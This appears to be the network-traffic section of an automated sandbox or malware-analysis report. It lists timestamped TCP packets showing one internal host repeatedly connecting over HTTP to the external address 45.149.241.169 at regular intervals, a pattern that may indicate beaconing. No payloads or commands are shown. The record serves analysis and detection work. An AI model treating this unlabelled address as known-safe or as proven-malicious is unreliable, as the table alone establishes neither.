Oct 3, 2024 09:21:11.025348902 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.030342102 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.030885935 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.033385038 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.038311005 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.038525105 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.043416977 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.917903900 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.917917967 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.917932034 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:11.918015957 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.918035984 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.918035984 CEST	49728	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:11.922868967 CEST	80	49728	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.085623980 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.090502024 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.090635061 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.092761993 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.097568035 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.097651005 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.102543116 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.878017902 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.878045082 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:12.878143072 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.878180981 CEST	49729	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:12.883774042 CEST	80	49729	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.030831099 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.039484024 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.039613008 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.045036077 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.053859949 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.053982019 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.062566996 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.804303885 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.804342985 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.804474115 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.804706097 CEST	49730	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.809510946 CEST	80	49730	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.947474003 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.952402115 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.952488899 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.958497047 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.963305950 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:13.963378906 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:13.969389915 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.643101931 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.643141985 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.643309116 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.643347025 CEST	49731	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.648261070 CEST	80	49731	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.799489021 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.804363966 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.804868937 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.806760073 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.811575890 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:14.812196016 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:14.817014933 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.448180914 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.448209047 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.448370934 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.448370934 CEST	49732	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.453200102 CEST	80	49732	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.613046885 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.618139029 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.618410110 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.625766993 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.630875111 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:15.631001949 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:15.635907888 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.426115990 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.426331043 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.426362991 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.426408052 CEST	49733	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.431251049 CEST	80	49733	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.606376886 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.611447096 CEST	80	49734	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.611574888 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.613740921 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.618597984 CEST	80	49734	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:17.618666887 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:17.623584032 CEST	80	49734	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:18.676727057 CEST	80	49734	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:18.676940918 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.682148933 CEST	80	49734	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:18.682245970 CEST	49734	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.836416006 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.841451883 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:18.841562033 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.843678951 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.848495960 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:18.848565102 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:18.853375912 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:19.691886902 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:19.691905022 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:19.692115068 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:19.692148924 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:19.692253113 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:19.692351103 CEST	49735	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:19.697873116 CEST	80	49735	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.060745001 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.065624952 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.065726042 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.067845106 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.073244095 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.073299885 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.383909941 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.434667110 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.434681892 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.718350887 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.718391895 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.718523026 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.718699932 CEST	49736	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.723424911 CEST	80	49736	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.882213116 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.887341022 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.887464046 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.889588118 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.894459009 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:20.894548893 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:20.899425983 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.526664019 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.526882887 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.527200937 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.527265072 CEST	49737	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.531765938 CEST	80	49737	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.692071915 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.696954966 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.697146893 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.704443932 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.709203005 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:21.709486008 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:21.714268923 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.447510004 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.447557926 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.447679043 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.450542927 CEST	49738	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.455429077 CEST	80	49738	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.719789028 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.724620104 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.724728107 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.726998091 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.731781960 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:22.731827021 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:22.736798048 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.391484976 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.391585112 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.391638994 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.391669989 CEST	49739	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.396516085 CEST	80	49739	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.528836966 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.533726931 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.533987045 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.536640882 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.541420937 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:23.541526079 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:23.546449900 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.274101019 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.274195910 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.274529934 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.274643898 CEST	49740	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.279090881 CEST	80	49740	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.417665005 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.422554016 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.422657967 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.424740076 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.429620028 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:24.429750919 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:24.434624910 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.101639986 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.101747036 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.101835966 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.101871014 CEST	49741	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.106678009 CEST	80	49741	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.244787931 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.249562025 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.249680996 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.251813889 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.256619930 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.256730080 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.261534929 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.961544037 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.961718082 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:25.961812019 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.961847067 CEST	49742	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:25.966661930 CEST	80	49742	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.106340885 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.111435890 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.111630917 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.113770008 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.118642092 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.118736029 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.123558044 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.738610029 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.738686085 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.738758087 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.738758087 CEST	49743	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.743539095 CEST	80	49743	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.885689020 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.890511990 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.890625000 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.892745018 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.897604942 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:26.897708893 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:26.902581930 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.713023901 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.713196993 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.713273048 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.713318110 CEST	49744	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.718153000 CEST	80	49744	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.860356092 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.865420103 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.865583897 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.867804050 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.872649908 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:27.873598099 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:27.878947020 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.560340881 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.560374975 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.560491085 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.560878038 CEST	49745	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.565618038 CEST	80	49745	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.699644089 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.704550982 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.705125093 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.706788063 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.711623907 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:28.712017059 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:28.717338085 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.491594076 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.491611958 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.491681099 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.491735935 CEST	49746	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.496598959 CEST	80	49746	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.642467022 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.647353888 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.647470951 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.649656057 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.654478073 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:29.654591084 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:29.659339905 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.421461105 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.421494961 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.421695948 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.421895981 CEST	49747	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.428215981 CEST	80	49747	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.573071003 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.579766989 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.579885960 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.586230993 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.592636108 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:30.592777014 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:30.599297047 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:31.421685934 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:31.421935081 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:31.421948910 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:31.421991110 CEST	49749	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:31.426743984 CEST	80	49749	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:31.571413040 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.555809021 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.593147039 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:32.593178988 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:32.593260050 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.593275070 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.595339060 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.603548050 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:32.603611946 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:32.608417988 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.372004032 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.372102022 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.372181892 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.372277021 CEST	49750	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.376904964 CEST	80	49750	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.513839960 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.518960953 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.519113064 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.521265984 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.526158094 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:33.526237965 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:33.531099081 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.070930958 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.070967913 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.071027994 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.071052074 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.071086884 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.071091890 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.071093082 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.071125031 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.071223974 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.071264982 CEST	49751	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.076126099 CEST	80	49751	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.213135958 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.218244076 CEST	80	49752	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.218341112 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.220405102 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.225244999 CEST	80	49752	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:35.225313902 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:35.230190992 CEST	80	49752	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:36.956888914 CEST	80	49752	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:36.957061052 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:36.962379932 CEST	80	49752	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:36.962466955 CEST	49752	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:37.108926058 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:37.114176989 CEST	80	49753	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:37.114552975 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:37.116375923 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:37.121193886 CEST	80	49753	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:37.121380091 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:37.126241922 CEST	80	49753	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:42.165158033 CEST	80	49753	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:42.165334940 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.170623064 CEST	80	49753	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:42.170718908 CEST	49753	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.305691004 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.310564995 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:42.310678959 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.312860966 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.317672014 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:42.317760944 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:42.322609901 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.028489113 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.028520107 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.028732061 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.028825998 CEST	49754	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.033643961 CEST	80	49754	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.170352936 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.175287962 CEST	80	49755	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.175405979 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.177519083 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.182331085 CEST	80	49755	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.182437897 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.187231064 CEST	80	49755	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.857722044 CEST	80	49755	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:43.857741117 CEST	80	49755	45.149.241.169	192.168.2.10
